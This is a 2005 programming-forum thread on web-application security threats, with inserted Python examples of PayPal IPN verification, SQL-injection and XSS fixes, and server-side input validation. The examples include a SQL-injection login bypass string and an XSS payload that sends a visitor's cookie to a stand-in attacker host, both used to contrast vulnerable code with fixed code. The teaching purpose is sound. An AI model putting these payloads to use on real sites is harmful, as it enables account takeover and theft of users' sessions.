What are the threats?

Discussion in 'Programming' started by wanboll, Sep 14, 2005.

  1. #1
    Hi all,

    I was just wondering. As someone just pointed out, we should never trust incoming POST/GET variables when coding server-side scripts... What are the other potential incoming hazards that we could face?
    Another question: we often use a return URL in PayPal and Stormpay buttons, right? Somewhere in the code is the return URL, and anyone with at least half a kilo (approx. 1 lb) of grey matter can tell that's the return URL... Go for it! Is there a way we can defend ourselves from that?
     
    wanboll, Sep 14, 2005 IP
  2. TheHoff
    #2
    Your server-side processing of the transaction should verify that PayPal received the money. Going directly to the return URL is pointless, as there will be no back-and-forth between your server and PayPal verifying the receipt. Try it yourself; no harm in it. Properly coded, the return URL should check for PayPal's receipt and display a failure message. Even if it displays a success message, the data would not have been written to your DB to indicate a successful transaction.
     
    TheHoff, Sep 14, 2005 IP
  3. wanboll
    #3
    I've never tried it, so I'm not sure how it's done, but I read a load of posts a while ago about people doing it. So it's not as easy as it sounds. That's good to know.
     
    wanboll, Sep 14, 2005 IP
  4. iTISTIC
    #4
    A long while ago, a lot of sites were coded in such a way that if you requested their return URL it would mean you had finalized a purchase. This is obviously very poor programming, but it existed on a LOT of web sites.

    What you need to do is integrate with PayPal's IPN system, so that when a user does get to your return URL you can check to make sure they did indeed finalize a purchase before you provide them with whatever they purchased. PayPal has very good docs on their site for integration with IPN, and I believe they have code samples as well for most of the common scripting languages.
     
    iTISTIC, Sep 14, 2005 IP
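An added example, not code from this thread or from PayPal, of the flow TheHoff (#2) and iTISTIC (#4) describe, written in Python rather than the PHP most of this forum uses. The return URL handler only reads state and never marks anything paid; the IPN handler does the echo-back check PayPal's IPN documentation describes (repost the received message with cmd=_notify-validate prepended and require the reply VERIFIED), then checks that the status, receiver, amount and currency match the order we created, and refuses a replayed txn_id. The validation endpoint URL, the use of the button's custom field to carry our order id, the merchant address, the orders table and every IPN message are assumptions or constructed data; the HTTP call to PayPal is replaced by an injectable validate() function so the example runs offline.

```python
# Added example (not the forum's or PayPal's own code): return URL vs. IPN.
# The return URL grants nothing by itself; an order is marked paid only after an
# IPN message has been echoed back to PayPal, answered VERIFIED, and matched
# against the order.  Network access is replaced by an injectable 'validate'.
import sqlite3
from urllib.parse import urlencode

IPN_VALIDATE_URL = "https://ipnpb.paypal.com/cgi-bin/webscr"  # assumed endpoint
MERCHANT_EMAIL = "sales@example.com"                          # constructed


def init_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE orders (id TEXT PRIMARY KEY, amount TEXT, "
               "currency TEXT, paid INTEGER DEFAULT 0)")
    db.execute("CREATE TABLE ipn_txns (txn_id TEXT PRIMARY KEY)")
    db.execute("INSERT INTO orders VALUES ('ORD-1001', '19.99', 'USD', 0)")  # constructed
    return db


def return_url_handler(db, params):
    """GET /return?order=...  What the buyer's browser hits after paying.
    Read-only: it reports what the IPN handler has already recorded."""
    row = db.execute("SELECT paid FROM orders WHERE id = ?",
                     (params.get("order", ""),)).fetchone()
    return "success" if row and row[0] == 1 else "pending"


def ipn_handler(db, form, validate):
    """POST /ipn  Called by PayPal, not by the buyer.
    validate(body) posts the body back to PayPal and returns its reply text."""
    # 1. Echo the exact message back with cmd=_notify-validate prepended.
    body = urlencode([("cmd", "_notify-validate")] + list(form.items()))
    if validate(body) != "VERIFIED":
        return "rejected: not verified by PayPal"
    # 2. Genuine message, but is it a completed payment to us, for this order's
    #    exact amount and currency?  (Assumes 'custom' carries our order id.)
    if form.get("payment_status") != "Completed":
        return "ignored: status " + form.get("payment_status", "?")
    if form.get("receiver_email", "").lower() != MERCHANT_EMAIL:
        return "rejected: wrong receiver"
    order = db.execute("SELECT amount, currency FROM orders WHERE id = ?",
                       (form.get("custom"),)).fetchone()
    if (order is None or order[0] != form.get("mc_gross")
            or order[1] != form.get("mc_currency")):
        return "rejected: amount/currency mismatch"
    # 3. A replayed IPN (same txn_id) must not credit the order twice.
    try:
        db.execute("INSERT INTO ipn_txns VALUES (?)", (form["txn_id"],))
    except sqlite3.IntegrityError:
        return "ignored: duplicate txn_id"
    db.execute("UPDATE orders SET paid = 1 WHERE id = ?", (form["custom"],))
    db.commit()
    return "paid"


def demo():
    """Run the attacks from the thread against the handlers; returns outcomes."""
    db = init_db()
    sent = set()  # constructed stand-in for PayPal's memory of what it sent

    def paypal_sends(form):
        sent.add(urlencode([("cmd", "_notify-validate")] + list(form.items())))
        return form

    def validate(body):  # stands in for the HTTPS post to IPN_VALIDATE_URL
        return "VERIFIED" if body in sent else "INVALID"

    genuine = {"txn_id": "TX1", "payment_status": "Completed",
               "receiver_email": MERCHANT_EMAIL, "mc_gross": "19.99",
               "mc_currency": "USD", "custom": "ORD-1001"}      # constructed
    underpaid = dict(genuine, txn_id="TX2", mc_gross="0.01")      # real, but too small
    forged = dict(genuine, txn_id="FAKE")                         # PayPal never sent it

    r = {}
    r["direct_return"] = return_url_handler(db, {"order": "ORD-1001"})
    r["forged_ipn"] = ipn_handler(db, forged, validate)
    r["underpaid_ipn"] = ipn_handler(db, paypal_sends(underpaid), validate)
    r["genuine_ipn"] = ipn_handler(db, paypal_sends(genuine), validate)
    r["return_after_ipn"] = return_url_handler(db, {"order": "ORD-1001"})
    r["replayed_ipn"] = ipn_handler(db, genuine, validate)
    return r
```

demo() walks through the cases the posts raise: hitting the return URL directly yields "pending", a forged IPN fails the echo-back, a genuine but underpaid IPN fails the amount check, the correct IPN flips the order to paid (after which the return URL shows "success"), and replaying that IPN is ignored.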
  5. J.D.
    #5
    * Cross-site scripting will allow the attacker to steal your customers' credentials and do whatever they do on your website.

    * SQL injection will allow the attacker to manipulate data in your database and, in some cases, to take over your machine.

    * Ability to execute unauthorized binary code (e.g. getting to a command-line interpreter) will allow the attacker to take over the machine.

    * Ability to execute script code will allow the attacker to deface your website, disable your administrative credentials, and figure out your machine's directory structure and configuration; if the scripting environment is poorly configured, the attacker can also take over the machine.

    * Buffer overflow attacks will allow the attacker to crash your server and sometimes take over the machine.

    Once the attacker has taken over your machine, s/he is like a kid in a candy store: they can reconfigure your and, sometimes, everybody else's web server to include their malicious content (e.g. adding a footer that points to their website, which will try to slip malicious code to each user); they can send tons of spam until/if you figure out what's going on; they can take over the network to which the machine is attached; they can steal your customers' credentials, credit card info, etc. (even if you don't store it locally); etc., etc., etc. You get the idea.

    J.D.
     
    J.D., Sep 14, 2005 IP
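The first two items on J.D.'s list, as an added example that is not part of the post: each vulnerable pattern beside its fix, run against an in-memory SQLite database and a constructed comment. The users table, the credentials and both payloads are made up; the hardened versions use parameterised queries and HTML entity escaping.

```python
# Added example (not from the forum post): SQL injection and stored XSS,
# vulnerable form beside the fix.  Table, users and inputs are constructed.
import html
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, is_admin INTEGER)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse', 1)")  # constructed
    return db


def login_vulnerable(db, name, password):
    # Untrusted POST fields pasted into the SQL text: a quote in the input ends
    # the string literal and the rest of the input becomes SQL.
    sql = ("SELECT name FROM users WHERE name = '%s' AND password = '%s'"
           % (name, password))
    return db.execute(sql).fetchone()


def login_safe(db, name, password):
    # Bound parameters travel separately from the SQL text; the engine never
    # parses them as SQL, so the same payload is just an odd user name.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchone()


def render_comment_vulnerable(comment):
    # Attacker-supplied text inserted into the page unchanged: it runs in every
    # visitor's browser with that visitor's session cookie (stored XSS).
    return "<p class='comment'>%s</p>" % comment


def render_comment_safe(comment):
    # html.escape turns < > & " ' into entities, so the browser displays the
    # text instead of executing it.
    return "<p class='comment'>%s</p>" % html.escape(comment, quote=True)


SQLI_PAYLOAD = "admin' --"   # closes the name literal; '--' comments out the password check
XSS_PAYLOAD = ("<script>document.location='http://attacker.invalid/?c='"
               "+document.cookie</script>")


def demo():
    db = make_db()
    return {
        "sqli_vulnerable": login_vulnerable(db, SQLI_PAYLOAD, "wrong"),   # logs in
        "sqli_safe": login_safe(db, SQLI_PAYLOAD, "wrong"),               # no row
        "xss_vulnerable_runs": "<script>" in render_comment_vulnerable(XSS_PAYLOAD),
        "xss_safe_runs": "<script>" in render_comment_safe(XSS_PAYLOAD),
    }
```

With the vulnerable login the query becomes SELECT name FROM users WHERE name = 'admin' --' AND password = 'wrong', which SQLite reads with the password clause commented out, so the attacker is logged in as admin without a password; the parameterised version returns no row. The escaped comment contains &lt;script&gt; rather than a tag, so nothing executes.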
  6. michele
    #6
    Always write your code assuming that someone will try to break into your system using it, especially where credit cards and money are involved. Always narrow down what your script will accept to the narrowest workable range of data.

    Never rely on client-side validation (JavaScript) for anything. It is only useful for pre-validation to save the user time, nothing else.
     
    michele, Sep 20, 2005 IP
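One way to apply michele's two rules server-side, as an added example that is not code from the post: a checkout form is checked against an allow-list schema that accepts only the narrowest workable value for each field, rejects any field the form was not supposed to send, and takes the price from the server's own catalogue rather than from the request, so whatever the JavaScript did or did not check in the browser is irrelevant. The field set, catalogue, country list and both submissions are constructed.

```python
# Added example (not michele's code): strict server-side allow-list validation.
# Nothing from the client is trusted; price comes from the server catalogue.
import re

CATALOGUE = {"SKU-100": 1999, "SKU-200": 4999}   # price in cents; constructed

# One validator per field: returns the cleaned value or raises ValueError.
def _sku(v):
    if v not in CATALOGUE:
        raise ValueError("unknown sku")
    return v


def _quantity(v):
    if not re.fullmatch(r"[1-9]\d?", v):     # 1..99 only: no sign, no spaces, no float
        raise ValueError("quantity out of range")
    return int(v)


def _email(v):
    if len(v) > 254 or not re.fullmatch(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}", v):
        raise ValueError("bad email")
    return v


def _country(v):
    if v not in {"US", "GB", "DE"}:           # only countries we ship to; constructed
        raise ValueError("unsupported country")
    return v


SCHEMA = {"sku": _sku, "quantity": _quantity, "email": _email, "country": _country}


def validate_order(form):
    """Return (clean_order, errors).  Every key must be in SCHEMA, every value a
    string, every field present.  A client-supplied 'price' is never read."""
    errors = {}
    unknown = set(form) - set(SCHEMA)
    if unknown:
        errors["_unknown"] = sorted(unknown)
    clean = {}
    for field, check in SCHEMA.items():
        raw = form.get(field)
        if not isinstance(raw, str):
            errors[field] = "missing"
            continue
        try:
            clean[field] = check(raw)
        except ValueError as e:
            errors[field] = str(e)
    if errors:
        return None, errors
    clean["total_cents"] = CATALOGUE[clean["sku"]] * clean["quantity"]
    return clean, {}


def demo():
    good = {"sku": "SKU-100", "quantity": "2",
            "email": "buyer@example.com", "country": "GB"}          # constructed
    # What someone who skipped the browser-side checks might send: negative
    # quantity, junk email, unsupported country, and their own 'price' field.
    tampered = {"sku": "SKU-100", "quantity": "-1", "email": "x",
                "country": "ZZ", "price": "1"}                      # constructed
    return validate_order(good), validate_order(tampered)
```

The clean submission comes back with total_cents computed from the catalogue (2 x 1999 = 3998); the tampered one is rejected with one error per bad field plus the unexpected price key, and no value from it ever reaches the database or the payment button.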
  7. GeorgeB.
    #7
    Google search "php security"

    The answers await you...
     
    GeorgeB., Sep 20, 2005 IP